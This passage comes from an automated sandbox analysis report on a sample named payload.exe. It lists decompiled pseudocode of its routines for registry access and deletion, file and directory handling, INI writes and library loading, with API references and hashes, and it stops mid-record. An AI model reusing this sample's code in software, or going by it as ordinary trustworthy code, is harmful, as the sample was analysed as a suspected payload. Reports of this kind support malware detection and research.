Instruction Fuzzy Hash: A711A771905205EFDF14DF64C6889AEBBB4EF11349F20843FE541B62C0D2B84A85DB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x423730;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x422eec =  *0x422eec + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x422eec, 0x7530,  *0x422ed4), 0);
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32 ref: 004013E4
SendMessageA.USER32 ref: 004013F4

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: a519dadb84f5fbb5742ded63e05e15cde03a873041ee9604df24846d4002906c
Instruction ID: da56ad7cfcb2a9fecb994a09e4a0bd113f750103611445cd7b28aada07ee45e3
Opcode Fuzzy Hash: a519dadb84f5fbb5742ded63e05e15cde03a873041ee9604df24846d4002906c
Instruction Fuzzy Hash: 2E012831B24210ABE7294B389D04B6A369CE710328F11823BF811F72F1D6B8DC42DB4D

Uniqueness

Uniqueness Score: -1.00%

Function 00402308 Relevance: 3.0, APIs: 2, Instructions: 40
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402308(void* __ebx) {
				char* _t6;
				long _t8;
				void* _t15;
				long _t19;
				void* _t22;
				void* _t23;

				_t15 = __ebx;
				_t26 =  *(_t23 - 0x18) - __ebx;
				if( *(_t23 - 0x18) != __ebx) {
					_t6 = E00402A3A(0x22);
					_t18 =  *(_t23 - 0x18) & 0x00000002;
					__eflags =  *(_t23 - 0x18) & 0x00000002;
					_t8 = E00402A7A(E00402B2F( *((intOrPtr*)(_t23 - 0x24))), _t6, _t18); // executed
					_t19 = _t8;
					goto L4;
				} else {
					_t22 = E00402B44(_t26, 2);
					if(_t22 == __ebx) {
						L6:
						 *((intOrPtr*)(_t23 - 4)) = 1;
					} else {
						_t19 = RegDeleteValueA(_t22, E00402A3A(0x33));
						RegCloseKey(_t22);
						L4:
						if(_t19 != _t15) {
							goto L6;
						}
					}
				}
				 *0x423788 =  *0x423788 +  *((intOrPtr*)(_t23 - 4));
				return 0;
			}

0x00402308
0x00402308
0x0040230b
0x0040233a
0x00402342
0x00402342
0x00402350
0x00402355
0x00000000
0x0040230d
0x00402314
0x00402318
0x004026a6
0x004026a6
0x0040231e
0x0040232e
0x00402330
0x00402357
0x00402359
0x00000000
0x0040235f
0x00402359
0x00402318
0x004028d2
0x004028de

APIs

Part of subcall function 00402B44: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00000022,00000000), ref: 00402B6C

RegDeleteValueA.ADVAPI32(00000000,00000000), ref: 00402327
RegCloseKey.ADVAPI32(00000000), ref: 00402330

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID: CloseDeleteOpenValue
String ID:
API String ID: 849931509-0
Opcode ID: 4530b8da9ca6ba3150dfaa5e4a1e2dd15eeb15549dac5782e6def93dd27c7dca
Instruction ID: 0b8f6a46cfbad05769843233fc9109b41d2ceb5d24a7fa4f39b64bc1fd674853
Opcode Fuzzy Hash: 4530b8da9ca6ba3150dfaa5e4a1e2dd15eeb15549dac5782e6def93dd27c7dca
Instruction Fuzzy Hash: CDF04473A00110ABDB10BFA48A4EAAE72799B50345F14443BF201B61C1D9BD4D12966D

Uniqueness

Uniqueness Score: -1.00%

Function 00406092 Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406092(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x409240);
				_t5 = GetModuleHandleA( *(_t10 + 0x409240));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x409244));
				}
				_t5 = E00406024(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}

0x0040609a
0x0040609d
0x004060a4
0x004060ac
0x004060b8
0x00000000
0x004060bf
0x004060af
0x004060b6
0x00000000
0x004060c7
0x00000000

APIs

GetModuleHandleA.KERNEL32(?,?,?,00403143,00000009), ref: 004060A4
GetProcAddress.KERNEL32(00000000,?,?,?,00403143,00000009), ref: 004060BF

Part of subcall function 00406024: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040603B
Part of subcall function 00406024: wsprintfA.USER32 ref: 00406074
Part of subcall function 00406024: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406088

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: ad31075058678b318fb1acd60a85244af91915838e2bda58b2d8d9f4dd3fd24d
Instruction ID: f390ed2799c289b087c769a87f24dfac638062b8da6604b2acd18c4b1555f769
Opcode Fuzzy Hash: ad31075058678b318fb1acd60a85244af91915838e2bda58b2d8d9f4dd3fd24d
Instruction Fuzzy Hash: B4E08632644111A6D320A7709D0493B72EC9E84710302483EF906F2191D738AC259669

Uniqueness

Uniqueness Score: -1.00%

Function 0040596C Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040596C(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x00405970
0x0040597d
0x00405992
0x00405998

APIs

GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\payload.exe,80000000,00000003), ref: 00405970
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405992

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
Instruction ID: 2848333a8a5b20597e43067d17cc290ce391feab13c7f73248cb22e1b8f9cacf
Opcode Fuzzy Hash: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
Instruction Fuzzy Hash: 5CD09E31658301AFEF098F20DD16F2EBAA2EB84B01F10962CBA82950E0D6755C159B26

Uniqueness

Uniqueness Score: -1.00%

Function 00405947 Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405947(CHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesA(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}

0x0040594c
0x00405952
0x00405957
0x00405960
0x00405960
0x00405969

APIs

GetFileAttributesA.KERNELBASE(?,?,0040555F,?,?,00000000,00405742,?,?,?,?), ref: 0040594C
SetFileAttributesA.KERNEL32(?,00000000), ref: 00405960

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 123b2631ce2b274a689f6f42d71c67174a47df8962c272e460887a4e83ced065
Instruction ID: 96e5362f07f59601f7516fe8bcac2aa0a8151a45168581d09323fa3b8cc485cf
Opcode Fuzzy Hash: 123b2631ce2b274a689f6f42d71c67174a47df8962c272e460887a4e83ced065
Instruction Fuzzy Hash: F7D01272908121AFC2102738ED0C89BBF65EB543717058B35FDB9F22F0D7304C568AA6

Uniqueness

Uniqueness Score: -1.00%

Function 00405455 Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405455(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}

0x0040545b
0x00405463
0x00000000
0x00405469
0x00000000

APIs

CreateDirectoryA.KERNELBASE(?,00000000,004030CC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032C9), ref: 0040545B
GetLastError.KERNEL32 ref: 00405469

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
Instruction ID: ace853db513f64caea17b5c73fb52fb3118c2a3fabff3065b7385b8b337d2f64
Opcode Fuzzy Hash: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
Instruction Fuzzy Hash: 9DC08C30B18101EAC6100B30AE087073D50AB00742F1444356206E10E0C6309050CD2F

Uniqueness

Uniqueness Score: -1.00%

Function 0040255C Relevance: 1.6, APIs: 1, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040255C(intOrPtr __ebx, void* __edi, void* __esi) {
				intOrPtr _t26;
				void* _t35;
				void* _t38;

				 *((intOrPtr*)(_t35 - 8)) = __ebx;
				_t26 = E00402A1D(2);
				_t38 = _t26 - 1;
				 *((intOrPtr*)(_t35 - 0xc)) = _t26;
				if(_t38 < 0) {
					L24:
					 *0x423788 =  *0x423788 +  *(_t35 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *((intOrPtr*)(__ebp - 0xc)) = 0x3ff;
					}
					if( *__esi == __bl) {
						L21:
						__esi =  *((intOrPtr*)(__ebp - 8));
						goto L22;
					} else {
						 *((char*)(__ebp + 0xb)) = __bl;
						 *(__ebp - 0x30) = E00405C70(__ecx, __esi);
						if( *((intOrPtr*)(__ebp - 0xc)) <= __ebx) {
							goto L21;
						} else {
							__esi =  *((intOrPtr*)(__ebp - 8));
							while(1) {
								__eax = __ebp - 0xd;
								__eax = E004059E4( *(__ebp - 0x30), __ebp - 0xd, 1); // executed
								if(__eax == 0) {
									break;
								}
								if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx) {
									 *(__ebp - 0xd) & 0x000000ff = E00405C57(__edi,  *(__ebp - 0xd) & 0x000000ff);
								} else {
									if( *((char*)(__ebp + 0xb)) == 0xd ||  *((char*)(__ebp + 0xb)) == 0xa) {
										__al =  *(__ebp - 0xd);
										if( *((intOrPtr*)(__ebp + 0xb)) == __al || __al != 0xd && __al != 0xa) {
											__eax = SetFilePointer( *(__ebp - 0x30), 0xffffffff, __ebx, 1);
										} else {
											 *((char*)(__esi + __edi)) = __al;
											__esi = __esi + 1;
										}
										break;
									} else {
										__al =  *(__ebp - 0xd);
										 *((char*)(__esi + __edi)) = __al;
										__esi = __esi + 1;
										 *((char*)(__ebp + 0xb)) = __al;
										if(__al == __bl) {
											break;
										} else {
											if(__esi <  *((intOrPtr*)(__ebp - 0xc))) {
												continue;
											} else {
												break;
											}
										}
									}
								}
								goto L25;
							}
							L22:
							 *((char*)(__esi + __edi)) = __bl;
							if(_t38 == 0) {
								 *(_t35 - 4) = 1;
							}
							goto L24;
						}
					}
				}
				L25:
				return 0;
			}

0x0040255e
0x00402561
0x00402566
0x00402569
0x0040256c
0x004028cf
0x004028d2
0x00402572
0x00402572
0x00402579
0x0040257b
0x0040257b
0x00402580
0x00402608
0x00402608
0x00000000
0x00402586
0x00402587
0x00402592
0x00402595
0x00000000
0x00402597
0x00402597
0x0040259a
0x0040259a
0x004025a3
0x004025aa
0x00000000
0x00000000
0x004025af
0x004025d8
0x004025b1
0x004025b5
0x004025e2
0x004025e8
0x00402600
0x004025f2
0x004025f2
0x004025f5
0x004025f5
0x00000000
0x004025bd
0x004025bd
0x004025c0
0x004025c3
0x004025c6
0x004025c9
0x00000000
0x004025cb
0x004025ce
0x00000000
0x004025d0
0x00000000
0x004025d0
0x004025ce
0x004025c9
0x004025b5
0x00000000
0x004025af
0x0040260b
0x0040260b
0x004015a8
0x004026a6
0x004026a6
0x00000000
0x004015a8
0x00402595
0x00402580
0x004028d8
0x004028de

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID: wsprintf
String ID:
API String ID: 2111968516-0
Opcode ID: 7ea698501722721c26a8941e34d84e293da030ffcd79d9a631de662ee5d141bb
Instruction ID: f0e9407761540611d0924c316636f69a46329dcf8394c365819cdff4e6cfa024
Opcode Fuzzy Hash: 7ea698501722721c26a8941e34d84e293da030ffcd79d9a631de662ee5d141bb
Instruction Fuzzy Hash: 5C210870C04299BEDF318B584A485AFBF749B01318F1480BBE891B63D1C1BC8A85EF1D

Uniqueness

Uniqueness Score: -1.00%

Function 00402616 Relevance: 1.5, APIs: 1, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E00402616(void* __eflags) {
				long _t6;
				long _t8;
				LONG* _t10;
				void* _t12;
				void* _t15;
				void* _t17;

				_push(ds);
				if(__eflags != 0) {
					_t6 = E00402A1D(2);
					_t8 = SetFilePointer(E00405C70(_t12, _t15), _t6, _t10,  *(_t17 - 0x1c)); // executed
					if( *((intOrPtr*)(_t17 - 0x24)) >= _t10) {
						_push(_t8);
						E00405C57();
					}
				}
				 *0x423788 =  *0x423788 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}

0x00402616
0x00402617
0x00402623
0x00402630
0x00402639
0x00402875
0x00402877
0x00402877
0x00402639
0x004028d2
0x004028de

APIs

SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 00402630

Part of subcall function 00405C57: wsprintfA.USER32 ref: 00405C64

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID: FilePointerwsprintf
String ID:
API String ID: 327478801-0
Opcode ID: 709a1efb691e22b24d5139b65a0299c5cd3135bd5f72422e81660ad42db7e028
Instruction ID: 52cb416d5db8590b47b50ad60af093b1f6dbc599d2fc32e6c75259d831e6d5c7
Opcode Fuzzy Hash: 709a1efb691e22b24d5139b65a0299c5cd3135bd5f72422e81660ad42db7e028
Instruction Fuzzy Hash: 01E04F76A04104BAE701FBA56E4DDBF73AADB50319B60843BF601F00C1C77D89459A3E

Uniqueness

Uniqueness Score: -1.00%

Function 00402283 Relevance: 1.5, APIs: 1, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402283(int __eax, CHAR* __ebx) {
				CHAR* _t11;
				void* _t13;
				CHAR* _t14;
				void* _t18;
				int _t22;

				_t11 = __ebx;
				_t5 = __eax;
				_t14 = 0;
				if(__eax != __ebx) {
					__eax = E00402A3A(__ebx);
				}
				if(_t13 != _t11) {
					_t14 = E00402A3A(0x11);
				}
				if( *((intOrPtr*)(_t18 - 0x18)) != _t11) {
					_t11 = E00402A3A(0x22);
				}
				_t5 = WritePrivateProfileStringA(0, _t14, _t11, E00402A3A(0xffffffcd)); // executed
				_t22 = _t5;
				if(_t22 == 0) {
					 *((intOrPtr*)(_t18 - 4)) = 1;
				}
				 *0x423788 =  *0x423788 +  *((intOrPtr*)(_t18 - 4));
				return 0;
			}

0x00402283
0x00402283
0x00402285
0x00402289
0x0040228c
0x00402294
0x00402298
0x004022a1
0x004022a1
0x004022a6
0x004022af
0x004022af
0x004022bc
0x004015a6
0x004015a8
0x004026a6
0x004026a6
0x004028d2
0x004028de

APIs

WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 004022BC

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: 4656573f168c310efd594f08e96abc660716981113b3fc3e41d9438b56e455a3
Instruction ID: ed5e863b5af70a22674a87f6432e4eb84017b1e79b4e81bbc09640d5f5368664
Opcode Fuzzy Hash: 4656573f168c310efd594f08e96abc660716981113b3fc3e41d9438b56e455a3
Instruction Fuzzy Hash: 8AE04F31B001746FDB217AF14E8EE7F11989B84348B64417EF601B62C3DDBC4D434AA9

Uniqueness

Uniqueness Score: -1.00%

Function 00402B44 Relevance: 1.5, APIs: 1, Instructions: 22
registryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00402B44(void* __eflags, void* _a4) {
				char* _t8;
				intOrPtr _t9;
				signed int _t11;

				_t8 = E00402A3A(0x22);
				_t9 =  *0x40a7e8; // 0x18eb24
				_t11 = RegOpenKeyExA(E00402B2F( *((intOrPtr*)(_t9 + 4))), _t8, 0,  *0x4237b0 | _a4,  &_a4); // executed
				asm("sbb eax, eax");
				return  !( ~_t11) & _a4;
			}

0x00402b58
0x00402b5e
0x00402b6c
0x00402b74
0x00402b7c

APIs

RegOpenKeyExA.KERNEL32(00000000,?,00000000,00000022,00000000), ref: 00402B6C

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 11541d565f05363a0d465782138c1ad9d83dbb2602eb40d854f4a90bf0086a6c
